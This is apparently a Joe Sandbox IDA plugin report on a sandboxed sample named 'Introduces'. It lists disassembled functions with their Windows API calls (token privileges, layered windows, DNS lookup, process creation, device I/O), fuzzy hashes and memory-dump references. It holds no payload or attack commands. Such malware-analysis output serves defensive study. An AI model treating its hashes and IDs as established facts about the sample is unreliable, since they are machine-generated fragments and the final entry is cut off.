Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 1da1603f4e170aa0ce8e7ddd693c58507af2dcdcf20d45c1f3fc37f84c4fafa0
Instruction ID: 3afdb837d03014ad66dd63d6553c1d11a8e6dc101f572491067e7173d1406bc8
Opcode Fuzzy Hash: 1da1603f4e170aa0ce8e7ddd693c58507af2dcdcf20d45c1f3fc37f84c4fafa0
Instruction Fuzzy Hash: 7D1124769081087EC708B7A8AD42EFE7B6DAF89321F100115F204A71C2DF6558C64BE1

Function 00A49274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A48D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A48D3F
Part of subcall function 00A48D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A48D49
Part of subcall function 00A48D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A48D58
Part of subcall function 00A48D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A48D5F
Part of subcall function 00A48D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A48D75

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00A492C1
_memcmp.LIBCMT ref: 00A492E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A4931A
HeapFree.KERNEL32(00000000), ref: 00A49321

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 60a1eea6d0371b89930a8eb9684825b299d98057e069d44b992e13bddcf889c2
Instruction ID: 6d44f1ef92dda7d7efa2133ef59e7917eba185177af9a9ed86f3d38f3014f1d8
Opcode Fuzzy Hash: 60a1eea6d0371b89930a8eb9684825b299d98057e069d44b992e13bddcf889c2
Instruction Fuzzy Hash: 8221AF32E40108EFDB10DFA4C949BEFB7B8FF85311F044059E894AB290D771AA15CB90

Function 00A7634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00A763BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A763D7
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A763E5
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00A763F3

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: c49e89c8010c4f2d1beb9a35e9c827e4c3c8e6349c9ee38f902c14779024faca
Instruction ID: 2e763d16e5df69f6204991b19855287676ceb62363f221829b34a12266b8c4d6
Opcode Fuzzy Hash: c49e89c8010c4f2d1beb9a35e9c827e4c3c8e6349c9ee38f902c14779024faca
Instruction Fuzzy Hash: 8211B631305914AFD704AB68DC45FBA77A9EF85320F18C119FA1ACB2D2CBB0AD01CB95

Function 00A4E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A4F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00A4E46F,?,?,?,00A4F262,00000000,000000EF,00000119,?,?), ref: 00A4F867
Part of subcall function 00A4F858: lstrcpyW.KERNEL32(00000000,?,?,00A4E46F,?,?,?,00A4F262,00000000,000000EF,00000119,?,?,00000000), ref: 00A4F88D
Part of subcall function 00A4F858: lstrcmpiW.KERNEL32(00000000,?,00A4E46F,?,?,?,00A4F262,00000000,000000EF,00000119,?,?), ref: 00A4F8BE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00A4F262,00000000,000000EF,00000119,?,?,00000000), ref: 00A4E488
lstrcpyW.KERNEL32(00000000,?,?,00A4F262,00000000,000000EF,00000119,?,?,00000000), ref: 00A4E4AE
lstrcmpiW.KERNEL32(00000002,cdecl,?,00A4F262,00000000,000000EF,00000119,?,?,00000000), ref: 00A4E4E2

Strings

cdecl, xrefs: 00A4E4D9

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: ce6575df54257308cf53690653361e8fa81400e5ceb76cdbf91b167b2f45d8ed
Instruction ID: 894e9ce178e437401611a913244555a1d8f6efab814810b58a3b4ac3cb02c2c9
Opcode Fuzzy Hash: ce6575df54257308cf53690653361e8fa81400e5ceb76cdbf91b167b2f45d8ed
Instruction Fuzzy Hash: 6B11EF3A200345AFCB25EF74DC49D7A77B8FF85350B40402AF80ACB2A0EB719981C7A1

Function 00A25312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A25331

Part of subcall function 00A1593C: __FF_MSGBANNER.LIBCMT ref: 00A15953
Part of subcall function 00A1593C: __NMSG_WRITE.LIBCMT ref: 00A1595A
Part of subcall function 00A1593C: RtlAllocateHeap.NTDLL(01010000,00000000,00000001,?,00000004,?,?,00A11003,?), ref: 00A1597F

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 8767c102f1e3ef597cfa021a50d6f38791f4b0d315a1b283cc3d242f2773a22b
Instruction ID: afba45e17e5894f15bae941cb995f46674a1c75dc328c890ec231769fd1c0046
Opcode Fuzzy Hash: 8767c102f1e3ef597cfa021a50d6f38791f4b0d315a1b283cc3d242f2773a22b
Instruction Fuzzy Hash: 7E11A332D05B25AFCF24BFB8FD156DA3BA4BF143A0B205539F8589E1A1DE7489818790

Function 00A54365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00A54385
_memset.LIBCMT ref: 00A543A6
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00A543F8
CloseHandle.KERNEL32(00000000), ref: 00A54401

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: d86eff26c13e25bb9587458e8d240957888fe1e6e71fb26ee1b4536aa7153aaa
Instruction ID: fced22ce693dcd10de31572cceaad5afba64a4ba5ca42d357249e55a29374420
Opcode Fuzzy Hash: d86eff26c13e25bb9587458e8d240957888fe1e6e71fb26ee1b4536aa7153aaa
Instruction Fuzzy Hash: 90110D719013287AD7309BA5AC4DFEBBB7CEF44734F00459AF908D7190D2704E848BA4

Function 00A66A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A57E51,?,?,00000000), ref: 00A04041
Part of subcall function 00A0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A57E51,?,?,00000000,?,?), ref: 00A04065

gethostbyname.WSOCK32(?,?,?), ref: 00A66A84
WSAGetLastError.WSOCK32(00000000), ref: 00A66A8F
_memmove.LIBCMT ref: 00A66ABC
inet_ntoa.WSOCK32(?), ref: 00A66AC7

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 4587e825bb4b7175d521928fc0316b0c305530d46af834305edb28aa9bfacd86
Instruction ID: 082be9c650cac11cbcadd49b033cc2601f0674ac41696c656a92a66455e79799
Opcode Fuzzy Hash: 4587e825bb4b7175d521928fc0316b0c305530d46af834305edb28aa9bfacd86
Instruction Fuzzy Hash: 80115476500108AFCB00EFE4DE86DEE77B8EF58310B144165F506A71A1DF309E14CB91

Function 00A496F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00A49719
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A4972B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A49741
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A4975C

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 78693ff972220154b8564fcd3fb743e85632149dcc06eee395c551d981d88dfa
Instruction ID: 3d0adf7d4fc3d95d6c1290aebecc620ff1ea763f4e4299cea3187342eb4c6c69
Opcode Fuzzy Hash: 78693ff972220154b8564fcd3fb743e85632149dcc06eee395c551d981d88dfa
Instruction Fuzzy Hash: 1E115A39900218FFEB10DF95CD84E9EBBB8FB48710F204091E900B7290D6716E21DB90

Function 009F166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 009F29E2: GetWindowLongW.USER32(?,000000EB), ref: 009F29F3

DefDlgProcW.USER32(?,00000020,?), ref: 009F16B4
GetClientRect.USER32(?,?), ref: 00A2B93C
GetCursorPos.USER32(?), ref: 00A2B946
ScreenToClient.USER32(?,?), ref: 00A2B951

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 0b3fba40cc7c942294e9e81aedd78ee122d88c2300961da6dc26af0d46dbfa0a
Instruction ID: 07729c5071a1c62877f54de19d17f526cb99b5910d213f99c45eb305f64ce04b
Opcode Fuzzy Hash: 0b3fba40cc7c942294e9e81aedd78ee122d88c2300961da6dc26af0d46dbfa0a
Instruction Fuzzy Hash: 46114336A0001DEBCB00EF98C885DBE77B8EB45301F504855EA41E7250C730BA92CBB1

Function 009F2111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 009F214F
GetStockObject.GDI32(00000011), ref: 009F2163
SendMessageW.USER32(00000000,00000030,00000000), ref: 009F216D

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 898845a3a257f40eed2ae823ac3d0a80e5a036bca02919cbf1f6e1f5550e5c02
Instruction ID: 76d1f65c85b804047eabc5d8e052654528e2d51b7b758ccc1588734434207063
Opcode Fuzzy Hash: 898845a3a257f40eed2ae823ac3d0a80e5a036bca02919cbf1f6e1f5550e5c02
Instruction Fuzzy Hash: A611877220560DBFEB028FA09C84EEBBB6DEF583A4F050212FB1452020D7319C61EBA4

Function 00A51941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00A504EC,?,00A5153F,?,00008000), ref: 00A5195E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00A504EC,?,00A5153F,?,00008000), ref: 00A51983
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00A504EC,?,00A5153F,?,00008000), ref: 00A5198D
Sleep.KERNEL32(?,?,?,?,?,?,?,00A504EC,?,00A5153F,?,00008000), ref: 00A519C0

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 6e3b81e4afeb58c20d76a32553630c0c68f16a488b74a65027f621f0b8f49a38
Instruction ID: e83f8f4a2ecf61e8c6fffccee7ac83db62930cf9e57cc1c4e04223c23139a22d
Opcode Fuzzy Hash: 6e3b81e4afeb58c20d76a32553630c0c68f16a488b74a65027f621f0b8f49a38
Instruction Fuzzy Hash: 93113331C04629EBCF00DFE5D998BEEBBB8BF09752F004145E980B2241CB3096A98B91

Function 00A7E1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00A7E1EA
LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00A7E201
RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00A7E216
RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00A7E234

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: ec20053ecd7fb0483eca7d3ae058f8e12f7297cd4d9e075e91732ab0a63d3393
Instruction ID: 129f59d9672936698f990bdb5ec438c66242381c3b4cc7c4d0ca538569d0cc10
Opcode Fuzzy Hash: ec20053ecd7fb0483eca7d3ae058f8e12f7297cd4d9e075e91732ab0a63d3393
Instruction Fuzzy Hash: 701152752453049BE730CF95DD08FD37BBCEB04B04F10C599A61AD6451D7B0E5089B91

Function 00A271E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00A2720B

Part of subcall function 00A278F2: __fltout2.LIBCMT ref: 00A2791B

__cftog_l.LIBCMT ref: 00A27231
__cftoe_l.LIBCMT ref: 00A27263

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: fc8c9690b4a5bc94697b0a4c3699f2e6242966780ba43a98b9c8766181375d4b
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 0301953204815EFBCF125F88EC02CED3F22BB19340B448525FA1858131C736CAB1AB81

Function 00A7B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00A7B956
ScreenToClient.USER32(?,?), ref: 00A7B96E
ScreenToClient.USER32(?,?), ref: 00A7B992
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A7B9AD

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: c67c9febfd20e22cc230745b408dfa36ace04470df916ebd7b0ad04ab195646e
Instruction ID: a9d56e711e43b63283fc96a0319e47fdb9fe715ae774a62d7d02778dcaaae4bb
Opcode Fuzzy Hash: c67c9febfd20e22cc230745b408dfa36ace04470df916ebd7b0ad04ab195646e
Instruction Fuzzy Hash: 891143B9D00209EFDB41CF98C984AEEBBF9FF48310F108166E914E3610E775AA658F50

Function 00A7BCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A7BCB6
_memset.LIBCMT ref: 00A7BCC5
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00AB8F20,00AB8F64), ref: 00A7BCF4
CloseHandle.KERNEL32 ref: 00A7BD06

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 3529cb4f1ae99ec739343189ff19bc9ebf6f187b157f9e12c5736f24f6c03a98
Instruction ID: b34632a10efa9e44966ffac923cd2595844d07fa6c21fab62c6bb8c958d0ae7c
Opcode Fuzzy Hash: 3529cb4f1ae99ec739343189ff19bc9ebf6f187b157f9e12c5736f24f6c03a98
Instruction Fuzzy Hash: B0F05EB26403047FE750AFB9AC05FFB3A5DEB08750F004521BA08D91A3DB798811C7A8

Function 00A57195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00A571A1

Part of subcall function 00A57C7F: _memset.LIBCMT ref: 00A57CB4

_memmove.LIBCMT ref: 00A571C4
_memset.LIBCMT ref: 00A571D1
LeaveCriticalSection.KERNEL32(?), ref: 00A571E1

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 3311b978f910e193acc45f485d81a0724e668203ef686c336c4bdd3008188e95
Instruction ID: d2cebf542e75ab197a7b2f42f5f4c7bc5a93ec2888fcd1826f5256c102b61e3d
Opcode Fuzzy Hash: 3311b978f910e193acc45f485d81a0724e668203ef686c336c4bdd3008188e95
Instruction Fuzzy Hash: 9BF0547A200100ABCF41AF55DD85E8ABB69FF49321F04C055FE085E21AC735E956DBB4

Function 00A7C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 009F16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009F1729
Part of subcall function 009F16CF: SelectObject.GDI32(?,00000000), ref: 009F1738
Part of subcall function 009F16CF: BeginPath.GDI32(?), ref: 009F174F
Part of subcall function 009F16CF: SelectObject.GDI32(?,00000000), ref: 009F1778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00A7C3E8
LineTo.GDI32(00000000,?,?), ref: 00A7C3F5
EndPath.GDI32(00000000), ref: 00A7C405
StrokePath.GDI32(00000000), ref: 00A7C413

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 36f6dfc4e58a9c21e80ec343549248c972560541c3c243264eb6a45ae1c5b665
Instruction ID: 18f58284150e3ef9e8e3211271021ac3456a984873eb90702a8f3d3f7aae6775
